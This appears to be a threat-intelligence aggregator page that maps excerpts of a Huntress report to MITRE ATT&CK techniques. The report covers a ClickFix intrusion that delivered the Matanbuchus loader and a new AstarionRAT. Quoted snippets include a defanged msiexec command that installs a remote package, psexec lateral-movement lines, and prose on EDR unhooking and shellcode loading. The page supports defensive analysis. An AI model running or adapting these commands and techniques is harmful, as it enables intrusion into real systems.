TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

A New RAT and a Hands-on-Keyboard Intrusion

2026-02-16 · Read original ↗

ATT&CK techniques detected

28 predictions
T1055.001Dynamic-link Library Injection
99%
“the loader unhooks both kernel32. dll and ntdll. dll. many edr products monitor malicious activity by placing inline hooks on critical api functions - small patches at the start of functions like ntallocatevirtualmemory that redirect execution to the edr ' s own inspection code. …”
T1055.001Dynamic-link Library Injection
96%
“##xe - three custom functions the malware author wrote and registered into the interpreter ( short for " lua allocate ", " lua copy ", and " lua execute " ) to allocate rwx memory, copy the shellcode into it, and jump to it via a raw function pointer call. sysupd doesn ’ t stand …”
T1055.001Dynamic-link Library Injection
95%
“##code … when will it end?! the 151kb of decoded shellcode is a position - independent reflective pe loader. only the first 3kb is executable code, the remaining ~ 148kb is payload data containing two embedded stages in a custom binary format. the entry point begins by walking th…”
T1055.001Dynamic-link Library Injection
93%
“. 0 boasts a new client and panel built from scratch, support for running exe / dll / shellcode / msi payloads both from disk and in memory, reverse shell capabilities via cmd / ps, wql query execution, high - quality screenshot capture, a morphing engine to maintain clean builds…”
T1055.001Dynamic-link Library Injection
91%
“##us 3. 0 loader component https : / / github. com / russianpanda95 / yara - rules / blob / main / matanbuchus / win _ mal _ matanbuchus _ loader. yar”
T1053.005Scheduled Task
87%
“to the hands - on activity. things got a bit spicy with astarionrat active on the initial endpoint, the operator established persistence via a scheduled task named application maintenance, configured to execute core. exe from c : \ programdata \ 2895e798a2579e6 \. approximately 1…”
T1055.001Dynamic-link Library Injection
84%
“mapped pe ' s section headers looking for. text, temporarily marks the loaded ( hooked ) dll ' s. text as writable with virtualprotect ( page _ execute _ readwrite ), overwrites it with the clean bytes, and restores the original memory protection. after this runs, any inline hook…”
T1055.001Dynamic-link Library Injection
77%
“byte of the target buffer is xored with a rolling key ( key [ i % key _ len ] ), used to decrypt the import and relocation data before processing with the data decrypted, the loader applies base relocations, resolves imports by hashing export names from loaded dlls, and patches t…”
T1204.004Malicious Copy and Paste
74%
“a new rat and a hands - on - keyboard intrusion acknowledgments : special thanks to amelia casley for her contributions to this investigation background in february 2026, the huntress tactical response team and soc responded to a hands - on intrusion that began with a clickfix in…”
T1055.001Dynamic-link Library Injection
73%
“, it has been disassembled into individual components and packed into a custom binary stream, a format the shellcode author designed specifically for this loader. the stream contains : - a flag byte ( 0x02 ) - four metadata dwords : section alignment, entry point rva, and two loa…”
T1078.003Local Accounts
66%
“- d \ \ < windows _ server > c : \ programdata \ usoshared \ rdp. bat - psexec. exe - accepteula - s - d \ \ < windows _ server > c : \ programdata \ usoshared \ rdp1. bat - psexec. exe - accepteula - s - d \ \ < windows _ server > c : \ programdata \ usoshared \ java. exe - psex…”
T1027.016Junk Code Insertion
64%
“alongside a malicious jli. dll and an encrypted lua script named sysupd. when java. exe executes, it naturally loads jli. dll, which is normally the java launch interface library, triggering the malicious code. embedded lua interpreter, you say? junk code obfuscation every meanin…”
T1573.001Symmetric Cryptography
63%
“throughout the chain, then validates the decrypted data for mz ( 0x5a4d ) and pe ( 0x4550 ) signatures. the core function calls rtldecompressbuffer with lznt1 compression to decompress the final payload. the decompressed output begins with a 12 - byte name field ( beacon. exe, nu…”
T1027Obfuscated Files or Information
58%
“that the file is exactly 8, 624 bytes before proceeding. to decrypt the shellcode, matanbuchus brute - forces its own chacha20 encryption using a known - plaintext check. the 32 - byte key is built by converting a numeric counter to an 8 - byte ascii string and appending a 24 - b…”
T1027Obfuscated Files or Information
56%
“key ( 32 bytes ) and nonce ( 12 bytes ). a separate index array stores [ offset, size ] pairs that reference individual encrypted strings within the blob. to decrypt a string, the loader reads the offset and size from the index array, slices the corresponding bytes from the encry…”
T1136.001Local Account
54%
“- d \ \ < windows _ server > c : \ programdata \ usoshared \ rdp. bat - psexec. exe - accepteula - s - d \ \ < windows _ server > c : \ programdata \ usoshared \ rdp1. bat - psexec. exe - accepteula - s - d \ \ < windows _ server > c : \ programdata \ usoshared \ java. exe - psex…”
T1078.003Local Accounts
53%
“a batch script was executed : - c : \ programdata \ usoshared \ rdp. bat unfortunately, the contents of the batch scripts were not recoverable. however, based on process telemetry, the script likely automated the creation of a rogue local administrator account. the following comm…”
T1204.001Malicious Link
52%
“a new rat and a hands - on - keyboard intrusion acknowledgments : special thanks to amelia casley for her contributions to this investigation background in february 2026, the huntress tactical response team and soc responded to a hands - on intrusion that began with a clickfix in…”
T1027Obfuscated Files or Information
46%
“##remented by 3. figure 7 : the obfuscated " yluwxdodoorf " string is decoded at runtime by subtracting 3 from each byte to resolve " virtualalloc " loading the encrypted lua script the loader locates itself on disk using getmodulehandleexw with the get _ module _ handle _ ex _ f…”
T1204.002Malicious File
46%
“the initial clickfix prompt to the final astarionrat payload, the attack passes through a silent msi install, zillya antivirus dll sideloading, matanbuchus 3. 0 with chacha20 encryption, a second dll sideloading stage via java. exe / jli. dll, an embedded lua 5. 4. 7 interpreter,…”
T1059Command and Scripting Interpreter
45%
“response as network - byte - order [ command _ id ] [ size ] [ data ] tuples, dispatches each task through the command dispatcher, and sends results back via http post. on failure, it reconnects and retries after sleeping. command dispatcher astarionrat supports 24 commands dispa…”
T1078Valid Accounts
43%
“- d \ \ < windows _ server > c : \ programdata \ usoshared \ rdp. bat - psexec. exe - accepteula - s - d \ \ < windows _ server > c : \ programdata \ usoshared \ rdp1. bat - psexec. exe - accepteula - s - d \ \ < windows _ server > c : \ programdata \ usoshared \ java. exe - psex…”
T1136.001Local Account
41%
“a batch script was executed : - c : \ programdata \ usoshared \ rdp. bat unfortunately, the contents of the batch scripts were not recoverable. however, based on process telemetry, the script likely automated the creation of a rogue local administrator account. the following comm…”
T1204.004Malicious Copy and Paste
39%
“##s : its obfuscation, communication protocol, and command set. what hasn ' t been documented until now is what happens after matanbuchus does its job. in the intrusion we responded to, matanbuchus delivered a rat we had never seen before, a fully featured, custom implant we have…”
T1036.005Match Legitimate Resource Name or Location
38%
“tmp412. 7z with password 4122102026 ) containing the zillya sideloading package - core. exe ( originally avcore. exe ) - legitimate zillya! antivirus core engine binary - msvcp120. dll, msvcr120. dll - legitimate visual c + + runtime dlls - systemstatus. dll - malicious dll ( mat…”
T1486Data Encrypted for Impact
38%
“commands a significantly higher price - $ 10, 000 / month for the https variant and $ 15, 000 / month for a stealthier dns - based version. that price tag is roughly 3 - 5x what a typical midmarket loader costs, reflecting its focus on high - value, targeted operations rather tha…”
T1105Ingress Tool Transfer
36%
“to issue an https get request to the c2 url to download the main matanbuchus module. the response from the c2 server is also chacha20 - encrypted. per the protocol, if the first 4 bytes of the downloaded payload equal 0xdeadbeef, the payload is written to disk. the remaining stru…”
T1195.002Compromise Software Supply Chain
35%
“legitimate windows update paths step one : trick the human the attack starts with a clickfix prompt instructing the victim to execute the following command : - " c : \ windows \ system32 \ msiexec. exe " - package hxxp : \ \ binclloudapp [. ] com \ temp \.. \ validationid \.. \ 4…”

Summary

ClickFix infection deploys Matanbuchus 3.0 loader and drops a new RAT that we’ve dubbed AstarionRAT. We break down the layers and the hands-on intrusion that followed.